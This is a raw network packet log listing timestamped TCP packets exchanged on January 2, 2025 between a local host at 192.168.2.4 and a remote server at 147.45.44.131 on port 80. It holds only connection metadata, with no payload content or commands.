Jan 2, 2025 19:13:04.080749989 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.080749989 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.080749989 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.080775976 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.080791950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080801964 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080811977 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080822945 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080832005 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080833912 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.080854893 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.080915928 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.080987930 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080998898 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081008911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081020117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081028938 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.081031084 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081041098 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081052065 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081054926 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.081063032 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081073046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081084013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081094027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081118107 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.081118107 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.081118107 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.081123114 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081134081 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081139088 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081171036 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.081203938 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.081298113 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081309080 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081319094 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081330061 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081345081 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081357956 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.081367016 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.081473112 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081484079 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081492901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081502914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081513882 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081523895 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081523895 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.081535101 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.081551075 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.081551075 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.081574917 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.161801100 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.161812067 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.161818981 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.161894083 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.161906004 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.161912918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.161922932 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.161935091 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.161946058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.161967039 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.161969900 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.161981106 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.161999941 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162009954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162020922 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162030935 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162034035 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162043095 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162054062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162058115 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162064075 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162075043 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162095070 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162100077 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162117958 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162136078 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162136078 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162242889 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162260056 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162276983 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162286997 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162292957 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162297010 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162316084 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162322044 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162328005 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162338972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162349939 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162352085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162368059 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162398100 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162400961 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162409067 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162419081 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162441969 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162452936 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162481070 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162487984 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162492990 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162502050 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162523985 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162625074 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162642956 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162673950 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162728071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162739038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162749052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162761927 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162772894 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162775993 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162801027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162801981 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162836075 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162853956 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162877083 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162897110 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.162965059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162981987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.162992954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163003922 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163014889 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163024902 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163029909 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.163048983 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.163048983 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.163058043 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163074970 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163085938 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163095951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163096905 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.163103104 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163120985 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.163161039 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.163187027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163198948 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163216114 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163233042 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163243055 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.163244009 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163273096 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.163330078 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163341999 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163352013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163378954 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.163379908 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163391113 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163402081 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.163403034 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163414001 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163434982 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.163438082 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163454056 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.163491011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163501978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163516045 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163542986 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.163570881 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.163908005 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163968086 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163979053 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.163990021 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164021969 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.164028883 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164040089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164050102 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164061069 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164063931 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.164071083 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164093971 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.164093971 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.164097071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164107084 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164118052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164129019 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164134026 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.164169073 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164185047 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.164211035 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.164654016 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164705038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164756060 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.164848089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164865017 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164875984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164885998 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164896965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164907932 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164911985 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.164925098 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164933920 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.164933920 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.164941072 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164947987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164958000 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164968967 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164978981 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.164988995 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165004015 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.165004015 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.165004969 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165014982 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.165015936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165026903 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165038109 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165049076 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165059090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165066957 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.165066957 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.165070057 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165080070 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165086031 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.165091038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165102005 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165112972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165123940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165134907 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165148020 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.165163994 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.165163994 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.165163994 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.248648882 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.248665094 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.248676062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.248708010 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.248718023 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.248723030 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.248733997 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.248744011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.248753071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.248764038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.248769999 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.248788118 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.248796940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.248806953 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.248807907 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.248823881 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.248857021 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249002934 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249012947 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249023914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249033928 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249043941 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249054909 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249054909 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249064922 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249068975 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249074936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249092102 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249102116 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249114037 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249114990 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249114990 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249124050 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249156952 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249156952 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249196053 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249207020 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249217987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249228954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249238014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249239922 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249248028 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249269962 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249269962 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249300957 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249311924 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249320984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249331951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249342918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249346018 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249353886 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249372959 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249372959 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249453068 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249517918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249527931 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249540091 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249552011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249562979 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249572039 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249583006 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249593973 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249597073 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249597073 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249603033 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249651909 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249651909 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249675035 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249686003 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249695063 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249718904 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249722004 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249732018 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249742031 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249758959 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249768972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249769926 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249779940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249782085 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249805927 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249816895 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249825954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249826908 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249836922 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.249850988 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.249891043 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.250024080 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250035048 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250044107 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250056028 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250066042 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250066042 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.250076056 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250087023 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250092983 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.250109911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250117064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.250119925 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250129938 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250144005 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.250144005 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.250173092 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250183105 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250193119 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250204086 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250205994 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.250251055 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.250772953 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250783920 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250793934 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250802994 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250808954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250819921 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250829935 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250838995 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.250838995 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.250839949 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.250868082 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.250869989 CET	80	49731	147.45.44.131	192.168.2.4
